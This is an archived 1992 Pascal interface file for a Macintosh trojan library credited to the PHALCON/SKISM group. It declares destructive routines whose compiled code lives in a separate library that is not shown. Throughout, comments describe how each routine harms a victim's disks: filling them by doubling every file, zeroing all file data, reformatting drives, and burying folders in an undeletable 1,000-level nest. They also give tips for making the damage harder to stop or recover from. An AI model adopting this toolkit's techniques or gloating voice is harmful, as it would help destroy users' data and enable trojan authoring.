home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tpsmtlv1.cpt / TPSMTL Volume 1.p < prev   
Encoding:
Text File  |  1992-06-13  |  6.2 KB  |  131 lines  |  [TEXT/PJMM]

  1. unit TPSMTL;
  2. {TPSMTL = The PHALCON/SKISM Macintosh Trojan Library Volume 1.                }
  3. {Written by Sixo, for -=PHALCON/SKISM=-.                                            }
  4. {                                                                                            }
  5. {Make sure you include the file "TPSMTL Volume 1.lib" in your project.  It            }
  6. {was created in THINK Pascal 4.0.1 but should be entirely compatible with            }
  7. {the MPW ".o" format, and probably earlier versions of TP.                            }
  8. {                                                                                            }
  9. {Read the "TPSMTL Readme" file as well.                                                }
  10.  
  11. interface
  12.  
  13.     procedure ChiaPutz;
  14.  
  15.     procedure TheDryer;
  16.  
  17.     procedure SmokeNSmog (DiskName: str255);
  18.  
  19.     procedure SmogNMirrors;
  20.  
  21.     procedure SmokeNMirrors (DiskName: str255);
  22.  
  23.     procedure BuriedTreasureTwo (FolderName: str255);
  24.  
  25.     procedure BuriedTreasureOne (FolderName: str255);
  26.  
  27. implementation
  28.  
  29.     procedure ChiaPutz;
  30.     external;
  31.     {Typical response: "Gee, why has every single file suddenly doubled in size?"    }
  32.     {Effects: Usually eliminates all available free disk space on all drives.            }
  33.     {Recovery chances: Nil.                                                                }
  34.     {                                                                                        }
  35.     {You know those Chia Pet things advertised on television?  The stupid things    }
  36.     {that grow instantly?  Well, ChiaPutz does that, to the victim's hard drive.    }
  37.     {Every single file doubles in size - if the hard drive fills up, the program        }
  38.     {stops.  Doesn't actually do much damage - all data is still intact - but it can    }
  39.     {certainly be annoying.  And there's no real way to fix it unless the victim        }
  40.     {happens to keep track of the file sizes of every file down to the byte.  Even    }
  41.     {then, who wants to weed through all those files, manually setting the file        }
  42.     {sizes with ResEdit or something?                                                    }
  43.     {                                                                                        }
  44.     {No variables need to be passed to it.                                                }
  45.  
  46.     procedure TheDryer;
  47.     external;
  48.     {Typical response: "Gee, why has every single file shrunk to zero k?"            }
  49.     {Effects: Permanently destroys all file data on all drives.                        }
  50.     {Recovery chances: Nil.                                                                }
  51.     {                                                                                        }
  52.     {Leaving clothes in the dryer usually winds up making them shrink.  So turn    }
  53.     {your victim's hard drive into a software dryer - reduce every single file        }
  54.     {down to zero kilobytes in size.  Both the resource fork and data fork are        }
  55.     {affected.  Even files that are already opened are affected, like the System    }
  56.     {file, and even the trojan application itself.  (To prevent that, you might want    }
  57.     {to have your trojan lock itself via the File Manager before using TheDryer.)    }
  58.     {Since no files are actually deleted - just the data is - the victim can't            }
  59.     {actually recover them.                                                                }
  60.     {                                                                                        }
  61.     {No variables need to be passed to it.                                                }
  62.  
  63.     procedure SmokeNSmog (DiskName: str255);
  64.     external;
  65.     {Typical response: "Gee, why has my hard drive been reformatted?"            }
  66.     {Effects: Reformats all drives and writes an empty file tree to them.            }
  67.     {Recovery chances: 50%.                                                            }
  68.     {                                                                                        }
  69.     {This is a combination of SmogNMirrors and SmokeNMirrors, and is more        }
  70.     {potent than either one.  That's not saying much, though.  There's a pretty        }
  71.     {good chance any file recovery utility worth its salt can recovery the files.    }
  72.     {Meanwhile, the user is annoyed, can't work, and can't even boot off his HD.    }
  73.     {                                                                                        }
  74.     {The variable "DiskName" is the name it will rename all drives to.                }
  75.  
  76.     procedure SmogNMirrors;
  77.     external;
  78.     {Typical response: "Gee, why isn't my hard drive being recognized?"            }
  79.     {Effects: Reformats all drives but does not rewrite an empty file tree.            }
  80.     {Recovery chances: 65%.                                                            }
  81.     {                                                                                        }
  82.     {Simply performs a reformatting of the drive.  This pretty much zaps all the    }
  83.     {files on the disk.  Since it doesn't rewrite an empty file tree, though, the        }
  84.     {computer usually won't even recognize the disk.  Rather annoying.                }
  85.     {                                                                                        }
  86.     {No variables need to be passed to it.                                                }
  87.  
  88.     procedure SmokeNMirrors (DiskName: str255);
  89.     external;
  90.     {Typical response: "Gee, where did all my files go?"                                }
  91.     {Effects: Rewrite an empty file tree to all drives.                                }
  92.     {Recovery chances: 85%.                                                            }
  93.     {                                                                                        }
  94.     {Lame, very very lame.  All it does is overwrite the current file tree with an    }
  95.     {empty one, thereby making it look like there are no files on the disk.  Easily    }
  96.     {recoverable by disk utilities, or should be.                                        }
  97.     {                                                                                        }
  98.     {The variable "DiskName" is the name it will rename all drives to.                }
  99.  
  100.     procedure BuriedTreasureTwo (FolderName: str255);
  101.     external;
  102.     {See BuriedTreasureOne for details.                                                }
  103.  
  104.     procedure BuriedTreasureOne (FolderName: str255);
  105.     external;
  106.     {Typical response: "Gee, what are all these folders and where are my files?"    }
  107.     {Effects: Buries all current dirs on disk at the bottom of a 1000-dir nest.        }
  108.     {Recovery chances: Nil.                                                                }
  109.     {                                                                                        }
  110.     {BuriedTreasureOne is my personal favorite.  What it does is create 1,000     }
  111.     {folders, nested within each other, then moves all other folders on disk to the    }
  112.     {very bottom folder.  End result: if the user wants his files, he'll have to        }
  113.     {open up one thousand folders to get there.  The really nasty parts about this    }
  114.     {are that: (a) no Find-File utility tested yet can search in folders that deep;    }
  115.     {(b) the Finder - even with 7 megs free - cannot allocate enough memory to    }
  116.     {trash all those folders; (c) if you run it twice or more on a disk, it generally    }
  117.     {ruins the disk permanently - I guess it surpasses the limit for directories on    }
  118.     {a volume.  Norton tries but cannot fix it, not even v2.0.                            }
  119.     {                                                                                        }
  120.     {The biggest problem with BuriedTreasureOne is that the user might wise up    }
  121.     {and slam the reset button while BT1 is building the nest.  Then the user won't    }
  122.     {really get damaged at all - sure, he'll have this giant undeletable set of        }
  123.     {folders on his disk, but nothing too serious.  So, BuriedTreasureTwo fixes    }
  124.     {this problem by using the following logic: create a folder, copy everything    }
  125.     {into it.  Now, remember that folder's name, create a new one, move first        }
  126.     {into second, and repeat those last three steps.  The drawback is that it is        }
  127.     {only about 30% as fast as BT1.  So take your pick.                                }
  128.     {                                                                                        }
  129.     {The variable "FolderName" is the name it will use for all nest folders.            }
  130.  
  131. end.